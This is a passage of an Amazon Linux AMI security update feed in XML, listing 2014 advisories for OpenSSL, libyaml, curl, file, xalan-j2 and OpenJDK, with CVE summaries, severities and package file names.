arch="i686"><filename>Packages/openssh-clients-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.7.39.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.7.39.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-7.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-320</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-320: critical priority package update for openssl</title><issued date="2014-04-07 17:26:00" /><updated date="2014-09-18 00:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0160:
1084875:
CVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
CVE-2013-0169:
This update fixes three vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section.
This update fixes several vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
907589:
CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160" title="" id="CVE-2014-0160" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1e-37.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-321</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-321: important priority package update for libyaml</title><issued date="2014-04-10 23:54:00" /><updated date="2014-09-18 00:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2525:
Heap-based buffer overflow in the yaml_parser_scan_uri_escapes function in LibYAML before 0.1.6 allows context-dependent attackers to execute arbitrary code via a long sequence of percent-encoded characters in a URI in a YAML file.
1078083:
CVE-2014-2525 libyaml: heap-based buffer overflow when parsing URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525" title="" id="CVE-2014-2525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml-devel" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.6-1.6.amzn1.i686.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.6-1.6.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.6-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-322</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-322: medium priority package update for curl</title><issued date="2014-04-10 23:54:00" /><updated date="2014-09-18 00:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0138:
1079148:
CVE-2014-0138 curl: wrong re-use of connections in libcurl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138" title="" id="CVE-2014-0138" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.36.0-2.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-323</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-323: medium priority package update for file</title><issued date="2014-04-10 23:55:00" /><updated date="2014-09-18 00:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-magic" version="5.11" release="13.16.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.11-13.16.amzn1.noarch.rpm</filename></package><package name="file-libs" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.11" release="13.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.11-13.16.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.11-13.16.amzn1.i686.rpm</filename></package><package name="file-devel" version="5.11" release="13.16.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.11-13.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-324</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-324: important priority package update for perl-YAML-LibYAML</title><issued date="2014-04-17 14:18:00" /><updated date="2014-09-18 00:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2525:
Heap-based buffer overflow in the yaml_parser_scan_uri_escapes function in LibYAML before 0.1.6 allows context-dependent attackers to execute arbitrary code via a long sequence of percent-encoded characters in a URI in a YAML file.
1078083:
CVE-2014-2525 libyaml: heap-based buffer overflow when parsing URLs
CVE-2013-6393:
The yaml_parser_scan_tag_uri function in scanner.c in LibYAML before 0.1.5 performs an incorrect cast, which allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted tags in a YAML document, which triggers a heap-based buffer overflow.
1033990:
CVE-2013-6393 libyaml: heap-based buffer overflow when parsing YAML tags
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6393" title="" id="CVE-2013-6393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525" title="" id="CVE-2014-2525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-YAML-LibYAML-debuginfo" version="0.41" release="4.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.41-4.9.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.41" release="4.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-YAML-LibYAML-0.41-4.9.amzn1.x86_64.rpm</filename></package><package name="perl-YAML-LibYAML-debuginfo" version="0.41" release="4.9.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-debuginfo-0.41-4.9.amzn1.i686.rpm</filename></package><package name="perl-YAML-LibYAML" version="0.41" release="4.9.amzn1" epoch="0" arch="i686"><filename>Packages/perl-YAML-LibYAML-0.41-4.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-325</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-325: important priority package update for xalan-j2</title><issued date="2014-04-17 23:50:00" /><updated date="2014-09-18 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0107:
It was found that the secure processing feature of Xalan-Java had insufficient restrictions defined for certain properties and features. A remote attacker able to provide Extensible Stylesheet Language Transformations (XSLT) content to be processed by an application using Xalan-Java could use this flaw to bypass the intended constraints of the secure processing feature. Depending on the components available in the classpath, this could lead to arbitrary remote code execution in the context of the application server running the application that uses Xalan-Java.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0107" title="" id="CVE-2014-0107" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0348.html" title="" id="RHSA-2014:0348" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xalan-j2-demo" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-demo-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-javadoc" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-javadoc-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-manual" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-manual-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package><package name="xalan-j2-xsltc" version="2.7.0" release="9.9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/xalan-j2-xsltc-2.7.0-9.9.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-326</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-326: important priority package update for java-1.6.0-openjdk</title><issued date="2014-04-17 23:53:00" /><updated date="2014-09-18 00:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2427:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2423:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2421:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-2414:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2412:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2403:
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability.
CVE-2014-2398:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
CVE-2014-2397:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-1876:
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200.
CVE-2014-0461:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0460:
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks.
CVE-2014-0458:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0457:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0456:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-0453:
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption.
CVE-2014-0452:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0451:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0446:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0429:
An input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine.
CVE-2013-5797:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5797" title="" id="CVE-2013-5797" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0429" title="" id="CVE-2014-0429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0446" title="" id="CVE-2014-0446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0451" title="" id="CVE-2014-0451" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0452" title="" id="CVE-2014-0452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0453" title="" id="CVE-2014-0453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0456" title="" id="CVE-2014-0456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0457" title="" id="CVE-2014-0457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0458" title="" id="CVE-2014-0458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0460" title="" id="CVE-2014-0460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0461" title="" id="CVE-2014-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1876" title="" id="CVE-2014-1876" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2397" title="" id="CVE-2014-2397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2398" title="" id="CVE-2014-2398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2403" title="" id="CVE-2014-2403" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2412" title="" id="CVE-2014-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2414" title="" id="CVE-2014-2414" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2421" title="" id="CVE-2014-2421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2423" title="" id="CVE-2014-2423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2427" title="" id="CVE-2014-2427" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0408.html" title="" id="RHSA-2014:0408" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.3.64.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-327</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-327: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-04-17 23:55:00" /><updated date="2014-09-18 00:23:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2427:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2423:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2421:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-2414:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2413:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2412:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2403:
It was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability.
CVE-2014-2402:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2398:
It was discovered that the fix for CVE-2013-5797 did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks.
CVE-2014-2397:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-1876:
An insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200.
CVE-2014-0461:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0460:
Multiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks.
CVE-2014-0459:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0458:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0457:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0456:
Multiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions.
CVE-2014-0455:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-0454:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0453:
It was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption.
CVE-2014-0452:
Multiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-0451:
